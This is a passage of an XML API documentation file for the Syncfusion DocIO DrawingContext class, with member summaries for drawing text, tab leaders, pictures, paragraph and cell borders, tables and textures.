        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawSeparator(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the Footnote separator
            </summary>
            <param name="txtRange">The TXT range.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTextRange(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.Layouting.LayoutedWidget,System.String)">
            <summary>
            Draws the text range.
            </summary>
            <param name="txtRange">The TXT range.</param>
            <param name="ltWidget">The lt widget.</param>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateBookmarkTargetPosition(Syncfusion.DocIO.DLS.Entity,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Update Target position to the bookmark hyperlink
            </summary>
            <param name="ent"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.CreateBookmarkRerefeceLink(Syncfusion.DocIO.DLS.Entity,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Create Bookmark reference link
            </summary>
            <param name="ent"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsOwnerParagraphContainBookMarkEnd(System.String)">
            <summary>
            Determine whether the paragraph containing bookmark end
            </summary>
            <param name="bk_Name"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsTextRangeFollowWithTab(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determine whether the tab stop is preserved after the text range in the current line
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateTabLeader(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.Layouting.LayoutedWidget,System.String@)">
            <summary>
            Update Tab Width.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FillDots(System.Drawing.Font,Syncfusion.Layouting.LayoutedWidget,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.String@)">
            <summary>
            Fill with dots for tab leader
            </summary>
            <param name="font">Font</param>
            <param name="ltWidget">Current layouted widget</param>
            <param name="charFormat">Character format of layouted widget</param>
            <param name="format">String format</param>
            <param name="text">text</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FillSingle(System.Drawing.Font,Syncfusion.Layouting.LayoutedWidget,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.String@)">
            <summary>
            Fill with sigle for tab leader
            </summary>
            <param name="font">Font</param>
            <param name="ltWidget">Current layouted widget</param>
            <param name="charFormat">Character format of layouted widget</param>
            <param name="format">String format</param>
            <param name="text">text</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FillHyphens(System.Drawing.Font,Syncfusion.Layouting.LayoutedWidget,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.StringFormat,System.String@)">
            <summary>
            Fill with hyphens for tab leader
            </summary>
            <param name="font">Font</param>
            <param name="ltWidget">Current layouted widget</param>
            <param name="charFormat">Character format of layouted widget</param>
            <param name="format">String format</param>
            <param name="text">text</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FillSpace(System.Drawing.Font,Syncfusion.Layouting.LayoutedWidget,System.Drawing.StringFormat,System.String@)">
            <summary>
            Fills with space
            </summary>
            <param name="leafWidget">The leaf widget</param>
            <param name="width">Tab width</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawSymbol(Syncfusion.DocIO.DLS.WSymbol,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the Symbol
            </summary>
            <param name="wSymbol"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.SetClip(System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Set clipping bounds
            </summary>
            <param name="clipBounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.ResetClip(System.Drawing.RectangleF)">
            <summary>
            Reset clipping bounds
            </summary>
            <param name="clipBounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawPicture(Syncfusion.DocIO.DLS.WPicture,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the image.
            </summary>
            <param name="image">The image.</param>
            <param name="bounds">The bounds.</param>
            <param name="unScaled">if set to <c>true</c> [un scaled].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawInlinePictureShape(Syncfusion.DocIO.DLS.WPicture,System.Drawing.RectangleF,System.Drawing.SizeF,System.Drawing.Image)">
            <summary>
            Draw the InlineShapePicture
            </summary>
            <param name="picture"></param>
            <param name="bounds"></param>
            <param name="size"></param>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.CreatePen(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Create the Pen to draw the picture border
            </summary>
            <param name="inlineShapeObject"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetColorBorder(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Get the color for the picture border
            </summary>
            <param name="inlineShapeObject"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLineCap(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineCap)">
            <summary>
            Get the line cap for picture border
            </summary>
            <param name="lineCap"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLineJoin(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineJoin)">
            <summary>
            Get LineJoin for picture border
            </summary>
            <param name="lineJoin"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetPictureBorderPen(Syncfusion.DocIO.DLS.InlineShapeObject,Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode,System.Drawing.Pen)">
            <summary>
            Get the Dash and line style for the picture shape
            </summary>
            <param name="inlineShape"></param>
            <param name="borderCode"></param>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetDashAndLineStyle(Syncfusion.DocIO.DLS.InlineShapeObject,System.Drawing.Pen)">
            <summary>
            Get the dash and line style for picture border
            </summary>
            <param name="inlineShape"></param>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetDashStyle(Syncfusion.DocIO.LineDashing,System.Drawing.Pen)">
            <summary>
            Get the Dash style for the border
            </summary>
            <param name="lineDashing"></param>
            <param name="pen"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.CropImageBounds(Syncfusion.DocIO.DLS.WPicture,System.Drawing.RectangleF@,System.Drawing.SizeF@)">
            <summary>
            Set the CropImageBounds if the image offset is negative
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.CropPosition(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Gets the position to crop the image
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawString(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.WParagraphFormat,System.Drawing.RectangleF,System.Single,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the string.
            </summary>
            <param name="text">The text.</param>
            <param name="charFormat">The char format.</param>
            <param name="paraFormat">The para format.</param>
            <param name="bounds">The bounds.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawSmallCapString(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.RectangleF,System.Drawing.Font,System.Drawing.StringFormat,System.Drawing.Brush,System.Boolean)">
            <summary>
            Draws the small cap string.
            </summary>
            <param name="text">The text.</param>
            <param name="charFormat">The character format.</param>
            <param name="bounds">The bounds.</param>
            <param name="font">The font.</param>
            <param name="format">The format.</param>
            <param name="textBrush">The text brush.</param>
            <param name="isCharacterSpacing">if set to <c>true</c> [is character spacing].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsTextNeedToClip(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determine whether the text is need to clip when the text range y position is greater than the owner row bottom position
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsWidgetNeedToClipBasedOnXPosition(Syncfusion.Layouting.LayoutedWidget,System.Single@,System.Drawing.RectangleF)">
            <summary>
            Determine whether the text is need to clip when the text range x position is beyond the cell bounds or crossing the cell bounds
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetColumnIndex(Syncfusion.DocIO.DLS.WSection,System.Drawing.RectangleF)">
            <summary>
            Gets the index of the column.
            </summary>
            <param name="section">The section.</param>
            <param name="sectionBounds">The section bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetClipTopPosition(System.Drawing.RectangleF,System.Boolean)">
            <summary>
            Get Y position to clip paragraph items
            </summary>
            <param name="bounds"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetDefaultFont(System.Drawing.Font,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Get Default font to render non east characters
            </summary>
            <param name="font"></param>
            <param name="charFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawStringBasedOnCharSpacing(System.Drawing.Font,System.Drawing.Brush,System.Drawing.RectangleF,System.String,System.Drawing.StringFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Draw String based on CharacterSpacing
            </summary>
            <param name="font">Font style of current Layouted widget</param>
            <param name="textBrush">Text brush</param>
            <param name="bounds">Layouted widget bounds</param>
            <param name="text">Text</param>
            <param name="format">Charater format</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.TransformGraphicsPosition(Syncfusion.Layouting.LayoutedWidget,System.Boolean,System.Drawing.PointF@,System.Single@)">
            <summary>
            Transform the graphics rendering positions based on rotation angle
            </summary>
            <param name="ltWidget">Current ltWidget</param>
            <param name="isNeedToScale">set to <c>true</c> when the widget need to scale</param>
            <param name="translatePoints">Translation points </param>
            <param name="rotationAngle">Rotation angle</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLayoutedTextBoxContentHeight(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Gets the height of the layouted text box content.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetWidthToShiftVerticalText(Syncfusion.DocIO.DLS.VerticalAlignment,System.Single,System.Single)">
            <summary>
            Get Width to shift vertical text
            </summary>
            <param name="tableCell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetClipBounds(System.Drawing.RectangleF,System.Single,System.Single)">
            <summary>
            Get Bounds to clip the text
            </summary>
            <param name="bounds"></param>
            <param name="clipWidth"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateClipBounds(System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Update clip bounds based on vertical cell 
            </summary>
            <param name="clipBounds"></param>
            <param name="ownerClipBounds"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateClipBoundsBasedOnOwner(System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Update clipping bounds based on owner clipping
            </summary>
            <param name="?"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCellHeightForVerticalText(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Height of the cell with text direction as vertical
            </summary>
            <param name="ent"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawChineseText(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Font,System.Drawing.Brush,System.Drawing.RectangleF,System.Drawing.StringFormat)">
            <summary>
            Draw Chinese Text
            </summary>
            <param name="text"></param>
            <param name="font"></param>
            <param name="textBrush"></param>
            <param name="bounds"></param>
            <param name="isNeedToScale">Set to <c>True</c> when the string need to be scale</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawUnicodeText(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Font,System.Drawing.Brush,System.Drawing.RectangleF,System.Drawing.StringFormat)">
            <summary>
            Draw Unicode Text
            </summary>
            <param name="text"></param>
            <param name="font"></param>
            <param name="textBrush"></param>
            <param name="bounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawUnicodeBidiText(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Font,System.Drawing.Brush,System.Drawing.RectangleF,System.Drawing.StringFormat)">
            <summary>
            Draw Unicode bidi Text
            </summary>
            <param name="text"></param>
            <param name="font"></param>
            <param name="textBrush"></param>
            <param name="bounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawUnicodeString(System.String,Syncfusion.DocIO.DLS.WCharacterFormat,System.Drawing.Font,System.Drawing.Brush,System.Drawing.RectangleF,System.Drawing.StringFormat)">
            <summary>
            Draw unicode string
            </summary>
            <param name="text">text</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsOwnerParagraphEmpty(System.String)">
            <summary>
            Determines whether the owner paragraph is empty
            </summary>
            <param name="text">text</param>
            <returns>
                <c>true</c> if owner paragraph is empty, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.RotateAndScaleTransform(System.Drawing.RectangleF@,System.Drawing.RectangleF@,System.Single,System.Drawing.PointF,System.Single)">
            <summary>
            Rotate and scale the graphics transform matrix
            </summary>
            <param name="bounds">Layoted widget bounds</param>
            <param name="scaleFactor">Scaling factor value</param>
            <param name="translatePoints">Translation points</param>
            <param name="rotationAngle">Rotation angle</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawParagraphBorders(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Draws the paragraph borders.
            </summary>
            <param name="borders">The paragraph format.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawParagraphBorders(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders)">
            <summary>
            Draws the paragraph borders
            </summary>
            <param name="borderRenderingOrder">Collection of borders, contains the each border rendering order</param>
            <param name="bounds">Border bounds</param>
            <param name="borders">Current paragraph borders</param>
            <param name="previousBorder">Previous paragraph borders</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawHorizontalBorder(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Boolean,System.Boolean,System.Single,System.Single,System.Single)">
            <summary>
            Draws the horizontal border.
            </summary>
            <param name="borderRenderingOrder">The border rendering order.</param>
            <param name="bounds">The bounds.</param>
            <param name="borders">The borders.</param>
            <param name="border">The border.</param>
            <param name="isMultiLineLeftBorder">if set to <c>true</c> [is multi line left border].</param>
            <param name="isMultiLineRightBorder">if set to <c>true</c> [is multi line right border].</param>
            <param name="isMultiLineHorizontalBorder">if set to <c>true</c> [is multi line horizontal border].</param>
            <param name="betweenBorderLineWidth">Width of the between border line.</param>
            <param name="leftBorderLineWidth">Width of the left border line.</param>
            <param name="rightBorderLineWidth">Width of the right border line.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawLeftBorder(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Borders,System.Boolean,System.Boolean,System.Boolean,System.Boolean,System.Single,System.Single,System.Single,System.Single)">
            <summary>
            Draws the left border.
            </summary>
            <param name="borderRenderingOrder">The border rendering order.</param>
            <param name="bounds">The bounds.</param>
            <param name="borders">The borders.</param>
            <param name="border">The border.</param>
            <param name="previousBorder">The previous border.</param>
            <param name="isMultiLineTopBorder">if set to <c>true</c> [is multi line top border].</param>
            <param name="isMultiLineBottomBorder">if set to <c>true</c> [is multi line bottom border].</param>
            <param name="isMultiLineLeftBorder">if set to <c>true</c> [is multi line left border].</param>
            <param name="isMultiLineHorizontalBorder">if set to <c>true</c> [is multi line horizontal border].</param>
            <param name="leftBorderLineWidth">Width of the left border line.</param>
            <param name="topBorderLineWidth">Width of the top border line.</param>
            <param name="betweenBorderLineWidth">Width of the between border line.</param>
            <param name="bottomBorderLineWidth">Width of the bottom border line.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawRightBorder(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Borders,System.Boolean,System.Boolean,System.Boolean,System.Boolean,System.Single,System.Single,System.Single,System.Single)">
            <summary>
            Draws the right border.
            </summary>
            <param name="borderRenderingOrder">The border rendering order.</param>
            <param name="bounds">The bounds.</param>
            <param name="borders">The borders.</param>
            <param name="border">The border.</param>
            <param name="previousBorder">The previous border.</param>
            <param name="isMultiLineTopBorder">if set to <c>true</c> [is multi line top border].</param>
            <param name="isMultiLineHorizontalBorder">if set to <c>true</c> [is multi line horizontal border].</param>
            <param name="isMultiLineRightBorder">if set to <c>true</c> [is multi line right border].</param>
            <param name="isMultiLineBottomBorder">if set to <c>true</c> [is multi line bottom border].</param>
            <param name="rightBorderLineWidth">Width of the right border line.</param>
            <param name="topBorderLineWidth">Width of the top border line.</param>
            <param name="betweenBorderLineWidth">Width of the between border line.</param>
            <param name="bottomBorderLineWidth">Width of the bottom border line.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTopBorder(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Single,System.Single,System.Single)">
            <summary>
            Draws the top border.
            </summary>
            <param name="borderRenderingOrder">The border rendering order.</param>
            <param name="bounds">The bounds.</param>
            <param name="borders">The borders.</param>
            <param name="border">The border.</param>
            <param name="isMultiLineTopBorder">if set to <c>true</c> [is multi line top border].</param>
            <param name="topBorderLineWidth">Width of the top border line.</param>
            <param name="leftBorderLineWidth">Width of the left border line.</param>
            <param name="rightBorderLineWidth">Width of the right border line.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBottomBorder(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},System.Drawing.RectangleF,Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Border,System.Boolean,System.Single,System.Single,System.Single)">
            <summary>
            Draws the bottom border.
            </summary>
            <param name="borderRenderingOrder">The border rendering order.</param>
            <param name="bounds">The bounds.</param>
            <param name="borders">The borders.</param>
            <param name="border">The border.</param>
            <param name="isMultiLineBottomBorder">if set to <c>true</c> [is multi line bottom border].</param>
            <param name="leftBorderLineWidth">Width of the left border line.</param>
            <param name="bottomBorderLineWidth">Width of the bottom border line.</param>
            <param name="rightBorderLineWidth">Width of the right border line.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.SortTwoBorders(System.Collections.Generic.List{Syncfusion.DocIO.DLS.Border},Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Borders,System.Boolean)">
            <summary>
            Sort the borders based on brightness
            </summary>
            <param name="renderingOrderList">Border rendering order list</param>
            <param name="firstBorder">Horizontal border</param>
            <param name="secondBorder">Either left border/right border</param>
            <param name="borders">Current paragraph borders</param>
            <param name="isLeftBorder">To ensure wether we need to remove left or right border</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.AddNextParagraphBounds(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF@)">
            <summary>
            Adds the next paragraph bounds.
            </summary>
            <param name="layoutedWidget">The layouted widget.</param>
            <param name="bounds">The bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Draws the border.
            </summary>
            <param name="border">The border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawParagraphBorder(Syncfusion.DocIO.DLS.Border,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Draws the border.
            </summary>
            <param name="border">The border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBorder(Syncfusion.Layouting.CellLayoutInfo.CellBorder,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Draws the border.
            </summary>
            <param name="border">The border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTable(Syncfusion.DocIO.DLS.WTable,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the table.
            </summary>
            <param name="table">The table.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTableRow(Syncfusion.DocIO.DLS.WTableRow,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the table row.
            </summary>
            <param name="row">The row.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTableCell(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the table cell.
            </summary>
            <param name="cell">The cell.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsTexBoxHaveBackgroundPicture(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Checks the TextBox for Background picture.
            </summary>
            <param name="cell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTextureStyle(Syncfusion.DocIO.TextureStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.RectangleF)">
            <summary>
            Draws the texture style.
            </summary>
            <param name="textureStyle"></param>
            <param name="foreColor"></param>
            <param name="backColor"></param>
            <param name="bounds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetForeColor(System.Drawing.Color,System.Drawing.Color,System.Single)">
            <summary>
            Gets the fore color.
            </summary>
            <param name="foreColor"></param>
            <param name="backColor"></param>
            <param name="percent"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetColorValue(System.Int32,System.Int32,System.Single,System.Boolean,System.Boolean)">
            <summary>
            Gets the color value.
            </summary>
            <param name="foreColorValue">The fore color value.</param>
            <param name="backColorValue">The back color value.</param>
            <param name="percent">The percent.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FillTexture(Syncfusion.DocIO.TextureStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.RectangleF)">
            <summary>
            Fill Texture within the bounds
            </summary>
            <param name="textureStyle">Texture Style</param>
            <param name="foreColor">Fore Color</param>
            <param name="backColor">Back Color</param>
            <param name="bounds">Bounds</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawCellBorders(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the cell borders.
            </summary>
            <param name="cell">The cell.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineLeftBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line left border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isFirstRow">if set to <c>true</c> [is first row].</param>
            <param name="isLastRow">if set to <c>true</c> [is last row].</param>
            <param name="isFirstCell">if set to <c>true</c> [is first cell].</param>
            <param name="isLastCell">if set to <c>true</c> [is last cell].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineLeftBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the double line left border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isFirstRow">if set to <c>true</c> [is first row].</param>
            <param name="isLastRow">if set to <c>true</c> [is last row].</param>
            <param name="isFirstCell">if set to <c>true</c> [is first cell].</param>
            <param name="isLastCell">if set to <c>true</c> [is last cell].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineRightBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line right border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isFirstRow">if set to <c>true</c> [is first row].</param>
            <param name="isLastRow">if set to <c>true</c> [is last row].</param>
            <param name="isFirstCell">if set to <c>true</c> [is first cell].</param>
            <param name="isLastCell">if set to <c>true</c> [is last cell].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineRightBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Draws the right double line border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isFirstRow">if set to <c>true</c> [is first row].</param>
            <param name="isLastRow">if set to <c>true</c> [is last row].</param>
            <param name="isFirstCell">if set to <c>true</c> [is first cell].</param>
            <param name="isLastCell">if set to <c>true</c> [is last cell].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineBottomBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Draws the multi line bottom border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineBottomBorder(Syncfusion.Layouting.CellLayoutInfo,System.Drawing.PointF,System.Drawing.PointF)">
            <summary>
            Draws the double line bottom border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawMultiLineTopBorder(Syncfusion.Layouting.CellLayoutInfo,Syncfusion.Layouting.CellLayoutInfo.CellBorder,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the multi line top border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="topBorder">The top border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isStart">if set to <c>true</c> [is start].</param>
            <param name="isEnd">if set to <c>true</c> [is end].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawDoubleLineTopBorder(Syncfusion.Layouting.CellLayoutInfo,Syncfusion.Layouting.CellLayoutInfo.CellBorder,System.Drawing.PointF,System.Drawing.PointF,System.Boolean,System.Boolean)">
            <summary>
            Draws the top double line border.
            </summary>
            <param name="cellLayoutInfo">The cell layout information.</param>
            <param name="topBorder">The top border.</param>
            <param name="start">The start.</param>
            <param name="end">The end.</param>
            <param name="isStart">if set to <c>true</c> [is start].</param>
            <param name="isEnd">if set to <c>true</c> [is end].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsMultiLineBorder(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Determines whether the specified border is multiline border
            </summary>
            <param name="borderType">Type of the border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsMultiLineParagraphBorder(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Determines whether [is multi line paragraph border] [the specified border type].
            </summary>
